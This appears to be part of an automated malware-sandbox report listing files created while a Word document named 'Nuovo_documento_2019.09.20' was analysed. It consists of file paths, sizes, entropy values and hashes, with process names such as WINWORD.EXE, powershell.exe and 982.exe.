                Entropy (8bit):3.2908383477122083
                Encrypted:false
                MD5:69DC5CCF53E2015272464C3E0634038E
                SHA1:D958188C6CE14A46B02CFDF0B19CF6BB1D64D3B5
                SHA-256:30D93A5AEDD28B3BF5D7828D0B991FDE918DF1CF927884BB5ED9777984671D44
                SHA-512:3FEF8443735557F11CA78847EC0BA30613C5E5A90CC743FFE17933CB415706425272EFED07B8D0F1EBA5CB74FFFE3C595D22C49BAEEF576439EB181C5696DD51
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420D0784.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.184567519044446
                Encrypted:false
                MD5:B22E6EC8E0F7CEBD01036702876D5F5B
                SHA1:0872D4936DB7DC87505AA59FD79807EEEDED6028
                SHA-256:53A55B993345813248369E7F03366D4F29583E250983BBF2EA33ED3AC30C8051
                SHA-512:7AFD1215CC94B8763E8DF26226480D06AB7B6DDF47CAEC7685AE39D6D3FF094D8BFC49AEB6AC0FFFA6360F582553804BF5A98A24D42A7E3C86F6F2F18916130B
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47489027.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.292538544789153
                Encrypted:false
                MD5:144E77ECF2566E5A422639AF02C91171
                SHA1:85B1E35F07F23204A55DAEA64CB2C2306F61E3E8
                SHA-256:56CE1776683DCBF6E6D57A0BD5C7E9EF07D50041D4380CC94A3EA64F98D3F988
                SHA-512:3D8D415595012AC051135E0673ABC6C812DE70626ABEA2B0D3FDAB692A24CD73CFDE9BF1DF071F28DB9E7E1CB64C60898F86A6DC2CD55924A0FF51C0856EA862
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\478BF9B5.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:1925A1BA461D79FAAAC473B86C1FE95C
                SHA1:7D13CE9AAD6BC3A0538FBB40DBF0B305D97F1DC5
                SHA-256:D9F295FC18196019436E4B0C3B71AB3E671490A3EEA8DF9093A2C36B17D8938E
                SHA-512:194A10B4739F5D4F54CA448463CE6D4B4B92D3EAB81C941D1404C2994969196D2952C54F1ACE4584CEF23B2FC43B203E4085992478428DDA454E76B3E5653781
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B60BD2.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1876948857934857
                Encrypted:false
                MD5:F2C10C9F1A817B04C3CB759A2ECE74DD
                SHA1:5B89CAA941D6F60695D8F2DFFCFE014360635379
                SHA-256:D7C8C67A2F815FB2AD5C7CAC5C3AAB1B6A7884ED9D11A4AFF0CFA0452CDB113E
                SHA-512:2C21AEE4341046480F1CC9EC7D145356493FDD1B0474E9338C1BC6C514DF89AFFE1F932C4511FBE0B97DE5E2DDEECAA86A0FF04210E5788E27FCEE4EDB2C6D32
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5273C8EF.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:34E5E0AF9BEB16046D5BDA5910A5D365
                SHA1:C36E97C5E1AA454763880A55606E307332AF8156
                SHA-256:AC92552BB32517C7166814787D764EE5CC593772707162A031E9139445B1347F
                SHA-512:4A23EEA03E259FBBF50A75E7767C76C054DFA64D55E925885BD90EBFDBCE9B3B5388D8BF20E11BCB32B939D9153FC95A1F8125BDBA709BDBC1BD2B0ACB533C7E
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\547645AB.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:C74440B1595AAB4849058E1E290D9D6D
                SHA1:E135C229620EA086DBAE3A17689C5DD544CAA9FE
                SHA-256:DB0298A56DA72017CF13281E2465A4B4095F43FA11FF1AE339671045A279D200
                SHA-512:E489F64BFAFF5D614E2287E37BDAC8C22899C1522F081B787289EE3BA727DF769386A2501772EC7E67C4F7A7D516ADE2E01824BD050F2337A2E6076ACA126E59
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\592348AC.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.170147126883901
                Encrypted:false
                MD5:3934D3DBA41B871D94194A81F9770D15
                SHA1:75BD83B5C542B4510C871D788867335FF9E7F61C
                SHA-256:F2394A106AA6D4ACC3A297DCFDC9958355E3C824450878DA358E0E407E427F9F
                SHA-512:DF33971396B7FEAB54DB8AE33E01DFC82357A591263ED0429687117F59CDD677888C37752C91EF64AB47D3003CD15B3BC2C1026548D0ABF0497D58639B378D85
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\627D15E1.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.265073788282792
                Encrypted:false
                MD5:112C151F42DD66B8A46F37F347E857A7
                SHA1:DEEAE8A48A77538A8017FC290216D49A1A5BA691
                SHA-256:52927CD91023D2087AD4948D329A610141299FD4C7ADD640B20B7768BCBE5D55
                SHA-512:8BB2817888D787949E78A6D0999EDAE258881CD7F2DB7769133FA051D37A9D48A157212F0B3878B8D4A478FB53E5440832750C20E8D71013B9595AE0164FA890
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BD64A8B.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:051ADBA813F643CAE64B8FF6469A7D56
                SHA1:C353030EFCF4E0B19D793600D800F9477F69C4DE
                SHA-256:97E79F0722FB906EDDF8DACA1EACA4C0BF9775E998327404D90EE694AAE0D17A
                SHA-512:B50CBE27B002A21E4DFB69C02EA195C969531652B860038D632622C354A0689D7930298946A7ABBA0A76EB165FB255B7E401500FD41D6145C623DCE4DB2917F6
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7806EFD5.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:DB9047F2F57348CB9907BC18F0B7C38C
                SHA1:2E91277450E3B32CDEE0E9E3F62A83E942AC2B33
                SHA-256:8C64939224DF6801A92FD5B8272F31CFFBDB765795C6461951BCD0CA63483A1C
                SHA-512:AFD8C0F4FE96E74F1CB38E59C950CE191C0033D70B413AD3824041D0448C5DE45A4C766404A4757B35AFEC967EF03A8744D9CACEBB0797A80E71F9FC214221DD
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7CB5B986.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.190530479005839
                Encrypted:false
                MD5:8420A766419DA43853FE79DCCFC9740B
                SHA1:099D841F94B6F38F52720E6C1E84A6A3735AED96
                SHA-256:B9D8BD38B39487C173786E908F5CAB10FE2C81DC6E6E91F98CB1EBD13BA943C6
                SHA-512:93359F16A4FB5842F339DB423A221D11B6854CE99DD4F1361AF2DDE9BFFD5B5A5EBA7473B2C667E3BF9E7C2BDE20745B1433BF86D61571296B4AEF42C3C98B8D
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F762AB8.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.184567519044446
                Encrypted:false
                MD5:F9E083929EB80449F05AADAD41E946AF
                SHA1:AC9252071CD9A4DF1972E6181D04EE2AB206D2B0
                SHA-256:C64132607E8E7FEF05CA767EEE8F14542F5444F4F66C4CB0DD21FA7941C3908E
                SHA-512:B7D5AA6A6F4CF43836EC7473F04B43FF2C3BFB08D94B79D50CE0145DD9D674055F4AC6DD0ACCAF1EC0F814E11047CBD8B5E75783181572414B441CE8A4FC19C4
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\887ADA1B.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.282583782676525
                Encrypted:false
                MD5:79007329A911130DC005DC316CC736F9
                SHA1:88453679F805B23150F0EE1750D45B34473F7AB4
                SHA-256:FF0E5C38AC42132F6F43A81434EDA10D88467ECBF832D9DC882441E9BDBA33CD
                SHA-512:1270E93AA7330F0A4C80385B98DCC2DF7624535272FD7E15547E2662C019E7B55E0391DAE35B17B2C38A73917760967687E4324398C0CBF4DA292B771978EEC9
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FF0CB08.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1928688241605054
                Encrypted:false
                MD5:6CF15EF7593B3BE31ABEB605865B7545
                SHA1:C27DE85EA247CA69EC7834581E677260CE6CAFBA
                SHA-256:91F230E1B45F6CDA65EEF13B9266842C564EF0BE40C468BCC9E61FAC74E73A70
                SHA-512:92986B9BBE796BA0F98301FEEE9FFC12ADE08E80E89374E91CCC67E329A2CA08E657811A69115983D4B25A8A1622603337D4C21F455817DE9002C85CD8C8F770
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BEDDBFC.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1759695423295566
                Encrypted:false
                MD5:84CB031A68B621ED84D8217A19EB8B31
                SHA1:391310274033A04F1490E0B2E804C59B98D59927
                SHA-256:ED6C187ABDA95ABC7DC7A92D827ABB5D69BB3D9654B0E6F8A00F9448ED877A2E
                SHA-512:4D56D1D61EE712E1515C1E4A6ED94864155741B7AD24108DC8A8E21875BB7543A9C6E7842E32779B4098CA338C32F66DEF05582F7EA09A21BD69C1BBD080A6DB
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1A3FD3E.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1901737754638897
                Encrypted:false
                MD5:2C7909FA4FBD0D988F5AAC92795E4142
                SHA1:D533B95896BFE834E6BBB50695B7C94A009BE583
                SHA-256:9B281E54D5A553777F545BCDCA198A89FE119115AAA05428121E793B7FB2A22E
                SHA-512:6EFBEA57BAF2196D019C1BD46B26674900CE598F8F4B9CDC30B232C53E5D1931A8C7D08DD60CF33C251C339270BEF6C2FD34F67D7253017FFCE61DFE920A14C6
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3AE3E5F.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.292538544789153
                Encrypted:false
                MD5:25FB55E776C272194B1527A141A79C25
                SHA1:CDCCE4AE12506FBB6617A16ADE43796D1A9F9152
                SHA-256:C5C8D7ADD9ED6F3535CF4E8096CACEA6E23C073FFFBED04246D56F15AA86E8F8
                SHA-512:6D299069989CB000992F7FA09C457EB3413063420DFBF2575F3B3C0A725B3399F2E36CCE155DF9ECB3ACA79F4B2344E42B3C5AD28D320BE9C1E79786E3B035BF
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6BDC6D3.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.292538544789153
                Encrypted:false
                MD5:FD9D5258FC01B92B85F5F66BDE0C716E
                SHA1:7E94E86FAA295CF3C1A6E0D0B1C81F237567C058
                SHA-256:FCC097EB3BD4F8175B7A1F5F6D41995486EC625A68C9EAD7A7D38183FC4D0224
                SHA-512:979D75314B11194456556331F3646ACC21F647C1EC29EC485E8CF9559607DE61263DE032F814EA7A75D5BECC0D20815DEA304BE706F2CC3C67C2863B7B7F9113
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE8B38BD.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.280783407516915
                Encrypted:false
                MD5:F6FA31796FED0A0DC93FE6C39F1F7175
                SHA1:85478D0124CE4181A40298BA9F60D6E952849421
                SHA-256:1AF18D6158D16A0FA06AFDA1EB5ECEBAC9B8B72BF881CF323A573C28BEED9D8A
                SHA-512:501BBAD27C74E02FD3091AD1CF7B9D95EF513F9443A29564238B70977A69810EB5E2641735250993460351B49E17DAF02512F817EDAA58A6A8810CF80B097F0D
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0C64E56.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.200681898780499
                Encrypted:false
                MD5:5CA7ED787FBF985F8332CA352925D1A4
                SHA1:1D80F7875FC737E650C47D1DB90B0EE0DCA72740
                SHA-256:81F293698612C3F38EE5EAA278FF29B3E8D180DCF3EE343F13CF66C823EDA192
                SHA-512:2FCF5E5769C436FA6E1B463373F0313A4CC232DFB3F972B64AF9C8C0B86472EE49342AC8FEDD6430324E37F9827A9BE345FB64868E163E7CB3B485CFD90F2EBB
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9FD7B59.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:0C6DB51E8E2E3C8B995A7E6736EC94ED
                SHA1:CF03B45CFCDAC281FA3C060B3DFFB12BB238CE0D
                SHA-256:653148B5E747C1BC657A0804EC8F05C0A521B3915881C36877C09EEBFE303FB6
                SHA-512:9DBB5DDF72ABEF17577DD02385D70B40E8071E8CB1D7A4A5710DCE78D2B9CF7C4DA8C4CCE241F82BE78776A8E449705E82AE4DE17CEE82D117D50F45C1BC162D
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA46CC32.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.186201474676835
                Encrypted:false
                MD5:CD01AEBC62607A15B77B5894B635319D
                SHA1:FCE721C300F30BC6FECB36363DE9204D7C1745E6
                SHA-256:E79B6B20A5206ABA5FD06DD7E435C2107628606262B1EC21772BEEB217246D72
                SHA-512:23C2FE5832926623EF65AAE2B695B360727E39704F2818A96BA8149538EE0B66FE851FD31A1A5A9CF5C6AC8CA3B129CA7EDF7457C02DEDB0C9E5437CAF5599B7
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3FA04D4.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.190530479005839
                Encrypted:false
                MD5:C0FE8A0070477766DF6C13946AC61B86
                SHA1:F74EF43E3FC2C185D43F9407BF13F8A793E045A0
                SHA-256:452E1F86F94FC7EEFF5936078DC3834BB14398CA415DC459CE87D79A9A2FA26B
                SHA-512:C1446CB37CA3E34F30F6FD2A940E3127B27CD67E89A2090BAC70D2CAB6783C6C1D109BBDA35F9A6CE197F853AC100BE3A681636BFE430B1976C0DF79EE31E288
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA52B6C5.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:B059BE68FCD725D1BFD6900E89788BF0
                SHA1:E0168057480CF002E64708A88057E0AD2B08ED88
                SHA-256:ECC34300BA1403725C5696E2752464B3E3EA8C6A9CEFDEB389FDE10773016009
                SHA-512:712E2236F404008596FD4C0A57917BA029B6864E73F258972DA0ED498CC1F426FF6F7E5FA5FE0D8535A3A1F2650DE9EC8861B6D96FCCF0C274D65BDEA829F576
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB3BCFCF.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2897342373615936
                Encrypted:false
                MD5:4673D1968085F58970A07BDE8D011481
                SHA1:9C7688F8B3F608E1E5DC16D4626123296A2A7E85
                SHA-256:4F3B3C921E93243D367174E450CBA6DC0C3A886997FC131DDECF7492F7D20D8F
                SHA-512:036CEA29EF05AC5014D586D101E2BE83B536B3B16F196DA8722E385844C564A7305D5088C2331C6CF75BC57A97FE6E20131555F38E0C12FA45180F00CDAD845C
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD9ED7F1.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:1FC651314C344FFF2D2AD7595369214E
                SHA1:2EF4A99A71AA67C1ED7D80E1D876BFCBF57D93A0
                SHA-256:AC4FB89FD0183ACA0F6D727B2FAEF810F20F1ECC6CA89E3DBEBC0EA8471E59F6
                SHA-512:15F9B3CDF98B5AF36299AAB31170A5D0459DA89C4E5D83011B2D2162690FA28A09D0F55770ABDEAFA88B355AC657D5ED5528093E02FD4EBF7BE6F7A23200AB6C
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E0222F9A.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.183506425980218
                Encrypted:false
                MD5:2EA0D3B2666E5952B7C46876B5F1660B
                SHA1:00D95C3A0F903FE8F5BFEB06590C695AF4802759
                SHA-256:E854B3883D488B96384983B0A04231973A40FEE94875623280899339DE39C613
                SHA-512:9AAEBFBBC278B36A04137F84855443622872EAABAB1B10579F3D14FB277391C8E54C786C0A32EE79BDBCEDDFB4B24D4B2AEDB663509B31EB9EDC3A6943E1478B
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E442C602.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.200681898780499
                Encrypted:false
                MD5:AD419B96AB066E06EAC036B6065287A7
                SHA1:4E67301D21534C03A75B00FC0222AC6EFAD05EF8
                SHA-256:5610C333CCCF85ABFC3F4930C62FB0252F98A828B167E8A7120471AA25F059EB
                SHA-512:1F55163298D6E49D3CEA6A884FB91129B6AD05175ED08D2C138CD3148EE9117FB03A9B51308C8AB65566A8D234F8F1C13EC65C21863FB0C0447E2C1E0446ADD4
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1476E24.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1958963691236155
                Encrypted:false
                MD5:66CAEB9BBC8EFDF4A9D4607D5BC82258
                SHA1:E0E761A19FAD9109CEC4A165C1839574959EAF95
                SHA-256:3C813E5385B439B7B9869B62EE117E19300FF92FDA5EED964D02487FAD9B5030
                SHA-512:91D82462DEAD4464F0EC6C6BF4F3A9F1767FEDC9822097D4F3D08D80DB3A176D8DCE4466C20DBF2835C872D9D28EFCDFBD018358898EECA5BCE6F0FDBDCE6540
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8C1B397.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2787120459436183
                Encrypted:false
                MD5:EA2FA46444CB04DE0026E45F39C647E3
                SHA1:44B29CC391B0B6957093EA1989C093C05906D4AC
                SHA-256:B69B4F5228A0B7932BB3D017768B92429FE318DB5E8EDAD3D26FBC30CB7FA9F7
                SHA-512:AF133041821E4EBAA8C8BF15598A6F2423EE57AE36BB35C1A1E724C399BAE37367F70E4D4FA74D08B8CEEE764DC41D4CAF82316C430CD6F60E4313FDC3F7B2E5
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA0AC26E.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.190530479005839
                Encrypted:false
                MD5:0D7996DF9763147D45FA25D78E8E35F5
                SHA1:B51F70E30C5C74CC08629EB2F375C15BBA3C2251
                SHA-256:7400B04CFD802B7DECC0F3B941EF2CAF592BD81376097F5256141C1A67ED9320
                SHA-512:F536F325CF80DE53209799C8DBF65E61B1B3AC5341D43920ABA6F0D3F59B1FF5975ADEEF8262E6FC613AC3EA80D5D219629481A83CD38EEA87F7EC0DD4989036
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B2D8E064-4C82-489B-9E64-A1B1ADE949CA}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):182128
                Entropy (8bit):4.340855849014704
                Encrypted:false
                MD5:536E0FF11E2CC49AF44BA87257D8CDCE
                SHA1:02DD0947598FA9EEBDCAF5617351610435B33DD0
                SHA-256:2EAF515FC7AF0A73EAB80C57D880E0028B4AC187AAA290A70457532A5DF60940
                SHA-512:C03ED0323B19EBF5DA2E49042AFA971BCB927D52FBF878FD7523E037EC5B8A9455C97F0EB9A9E42169B513ED75D4F5415FFE658DB76924679318A974E514A38C
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\4aacbf725e5908a192ccd61db75414d6_041d84af-7e76-450d-8340-55db3c73c359
                Process:C:\Users\user\982.exe
                File Type:data
                Size (bytes):2102
                Entropy (8bit):7.176598689928795
                Encrypted:false
                MD5:D098E1BFB9EA7F29AD8CFB93ED6D90A8
                SHA1:C893189C0A0540BE6E105675E679FEE8ECCB2F05
                SHA-256:087A78E04865A9A90EFFD6033E50FFA19B3566596C40C99962A3738C8CD9BA1D
                SHA-512:6815B12F41688AF8D728A8C4B7B65EEF9A252C0368B988E86F3F05C483956DB944ECA2F45C978EA851E4388843AB3AACC087F846625F0C20C2524070DEF56463
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Nuovo_documento_2019.09.20.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 12 10:48:02 2019, mtime=Mon Aug 12 10:48:02 2019, atime=Fri Sep 20 10:29:23 2019, length=238592, window=hide
                Size (bytes):2226
                Entropy (8bit):4.551273023282595
                Encrypted:false
                MD5:234F18866F9CA3536B02E3109C2D58F5
                SHA1:02074004BA25998464F686E980C0C1BCE2A95B03
                SHA-256:6A9AB04EFF4826C43B411A37360511FF4E35CB221A72CE7A77A7227A769B620D
                SHA-512:137515DC683B65C8618C1E4BE15B5A9CC7E10EBC10989EDE5C894B9A94FC895F78CAB6A1C83AD22438A121C700E128B39B213D0AC5CE1211196D2A93066EA030
                Malicious:false
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Size (bytes):86
                Entropy (8bit):4.493255092405266
                Encrypted:false
                MD5:5E61C5A9137DC37593811391C419A91D
                SHA1:AEECD1E614F40C39C2B7BDCFB26E9214629BA26D
                SHA-256:14217EBAA31435E304D13CB8F27B28A5AD426876B3CA7AE21B9BD4DAA6CC8F31
                SHA-512:9F580FD296C60BA4758D8907EF7E402F4B875A260C3584596DBC21578FF5003909AA622B9B31CECBF963464CEC769B6C33B4E07EBF9ABC9DFC6A149129BCBD1F
                Malicious:false
                Preview:[doc]..Nuovo_documento_2019.09.20.LNK=0..[folders]..Nuovo_documento_2019.09.20.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Size (bytes):162
                Entropy (8bit):2.206542077975962
                Encrypted:false
                MD5:D00AF25948EE6C7F7AB78C2C16AACD3B
                SHA1:A02DBBFB4A5627CA061BD0608815F6288263C282
                SHA-256:63B8414CA7924A8ADAD92175E7EB163CB257401701D09AF07C97AC32EA454065
                SHA-512:BCD94B474CBB43776EB0CFFBA9578801DFE65254F613C8172352CD2E0FB702835899E4BB285E8C512823C9DAADD970567B921D22DD1F728F236FB4D7EB48BD3C
                Malicious:false
                Preview:.user.............................................l.u.k.e.t.a.y.l.o.r.....Uf.........$...".g..................................................>.........p.D.
                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\728H4QLN5MVJAX6C10J2.temp
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Size (bytes):8016
                Entropy (8bit):3.5568338840501657
                Encrypted:false
                MD5:CE852F8A187F08975F76875C4837AC96
                SHA1:44E5086B25B75B5480960D5F50600CB801E787A0
                SHA-256:627822DA4BBD61056220812CABE1C9AC0F8FA9257E19ED615E5C2C59E99C475E
                SHA-512:C06800C83BD0B3918735BDE5686960B9EB89178DC9CBBE1EA2C202EBABC12CB5B2B93AB24706F14502C11873FCF4DFE965AD0937F3B46A906B628D62CCE491FE
                Malicious:false
